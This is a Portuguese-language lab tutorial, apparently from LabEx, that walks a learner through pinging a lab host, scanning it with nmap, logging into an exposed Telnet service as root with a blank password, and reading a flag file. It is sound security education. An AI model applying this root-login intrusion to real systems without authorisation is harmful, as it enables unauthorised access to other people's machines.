Introdução
Bem-vindo a este laboratório prático sobre enumeração e acesso de rede. No campo da cibersegurança, o primeiro passo para avaliar a segurança de um sistema é entender quais serviços ele expõe à rede. Este processo é chamado de enumeração.
Neste laboratório, você simulará as fases iniciais de um teste de penetração. Você começará confirmando a conectividade com uma máquina alvo. Em seguida, usará o nmap, uma poderosa ferramenta de varredura de rede, para descobrir portas abertas e identificar serviços em execução. Finalmente, você explorará um serviço Telnet fracamente configurado para obter acesso ao sistema alvo e recuperar uma flag oculta. Este exercício fornecerá a você habilidades fundamentais em reconhecimento e exploração de rede.
Ao concluir, você entenderá como:
- Verificar a conectividade de rede usando
ping. - Escanear portas e serviços abertos usando
nmap. - Conectar-se a um serviço Telnet.
- Explorar uma simples má configuração para obter acesso ao sistema.
Vamos começar.
Verificar Conectividade com o Alvo usando Ping
Nesta etapa, você iniciará a fase de reconhecimento verificando a conectividade com o sistema alvo. O comando ping é uma utilidade de rede fundamental usada para testar se um host é alcançável em uma rede IP. Ele envia pacotes ICMP Echo Request para o alvo e aguarda pacotes ICMP Echo Reply.
Seu ambiente foi pré-configurado com um sistema alvo acessível através do nome de host target.
Execute o seguinte comando no terminal para enviar quatro pacotes para o target e confirmar que ele está online:
ping -c 4 target
Você deverá ver uma saída semelhante à seguinte, indicando que o alvo está respondendo e a conexão está estável. O endereço IP exato e os valores de tempo podem variar.
PING target (172.17.0.2) 56(84) bytes of data.
64 bytes from target (172.17.0.2): icmp_seq=1 ttl=64 time=0.086 ms
64 bytes from target (172.17.0.2): icmp_seq=2 ttl=64 time=0.064 ms
64 bytes from target (172.17.0.2): icmp_seq=3 ttl=64 time=0.063 ms
64 bytes from target (172.17.0.2): icmp_seq=4 ttl=64 time=0.064 ms
--- target ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3069ms
rtt min/avg/max/mdev = 0.063/0.069/0.086/0.010 ms
Assim que você vir as respostas bem-sucedidas, poderá ter certeza de que sua máquina pode se comunicar com o alvo.
Escanear Portas Abertas com Nmap
Nesta etapa, você usará o nmap para realizar uma varredura de portas no alvo. Nmap (Network Mapper) é uma ferramenta essencial para descoberta de rede e auditoria de segurança. Ao escanear portas abertas, você pode identificar quais serviços estão em execução no alvo, o que é um passo crucial para encontrar vulnerabilidades potenciais.
Execute o seguinte comando em seu terminal:
nmap target
O Nmap agora escaneará a máquina target. Após alguns momentos, ele exibirá um relatório de suas descobertas. A saída deve ser semelhante a esta:
Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-12 10:54 CST
Nmap scan report for target (172.17.0.2)
Host is up (0.00011s latency).
Other addresses for target (not scanned): 172.17.0.2 172.17.0.2 172.17.0.2 172.17.0.2
Not shown: 999 closed ports
PORT STATE SERVICE
23/tcp open telnet
Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
Observe a saída com atenção. O Nmap descobriu que a porta 23/tcp está open (aberta) e está executando o serviço telnet. Este é o nosso ponto de entrada para a próxima etapa.
Conectar ao Alvo via Telnet
Nesta etapa, você tentará se conectar à porta Telnet aberta que descobriu. Telnet é um protocolo antigo e inseguro que fornece uma interface de linha de comando para um host remoto. Sua principal vulnerabilidade é que ele transmite todos os dados, incluindo nomes de usuário e senhas, em texto puro (cleartext). Tentaremos explorar uma configuração incorreta comum: uma conta com senha em branco.
Execute o comando telnet para se conectar ao target:
telnet target
Você será conectado ao serviço Telnet e solicitado a inserir um nome de usuário.
Trying 172.17.0.2...
Connected to target.
Escape character is '^]'.
target login:
O sistema está solicitando um login. Uma prática comum em testes de penetração é tentar nomes de usuário padrão ou comuns. Vamos tentar root. Digite root no prompt de login e pressione Enter. Como o sistema pode estar mal configurado para permitir uma senha em branco, não insira uma senha e simplesmente pressione Enter novamente se solicitado.
target login: root
Se for bem-sucedido, você será logado e apresentado a um prompt de shell, como #. Isso indica que você obteve acesso administrativo ao sistema alvo.
/ #
Agora você está dentro do shell do sistema alvo.
Explorar Sistema Alvo e Localizar Flag
Nesta etapa, tendo obtido acesso com sucesso ao sistema alvo, sua tarefa final é explorar o sistema de arquivos e encontrar a flag. Isso simula a fase de pós-exploração, onde um atacante procura informações confidenciais.
Você está atualmente no diretório raiz (/) da máquina alvo. Use o comando ls para listar os arquivos e diretórios em sua localização atual.
ls
Você deverá ver uma lista de arquivos. Procure por um arquivo chamado flag.txt.
/ ## ls
bin dev etc flag.txt home root usr
/ #
Agora que você localizou o arquivo, use o comando cat para exibir seu conteúdo. Isso revelará a flag.
cat flag.txt
O terminal exibirá o valor hash da flag.
/ ## cat flag.txt
labex{d3adb33f_p0rt_sc4nn1ng_m4st3ry}
/ #
Parabéns! Você enumerou, acessou e recuperou com sucesso a flag do sistema alvo. Copie o valor da flag para completar o laboratório. Para sair da sessão Telnet, você pode digitar exit e pressionar Enter.
Resumo
Neste laboratório, você completou um fluxo de trabalho básico de teste de penetração, desde a reconhecimento até a obtenção de acesso. Você aprendeu a:
- Usar
pingpara confirmar que um alvo está online e acessível. - Empregar
nmap -sVpara realizar um escaneamento de portas, identificando portas abertas e os serviços em execução nelas. - Identificar e conectar-se a um serviço Telnet inseguro.
- Explorar uma configuração incorreta comum (um usuário com senha em branco) para obter acesso ao shell de um sistema remoto.
- Navegar pelo sistema de arquivos do alvo para encontrar e recuperar informações confidenciais (a flag).
Este exercício destaca a importância dos fundamentos de segurança de rede. Serviços como Telnet não devem ser expostos à internet, e todas as contas devem ser protegidas com senhas fortes e exclusivas. Ao entender como os atacantes operam, você estará mais bem equipado para defender seus próprios sistemas.



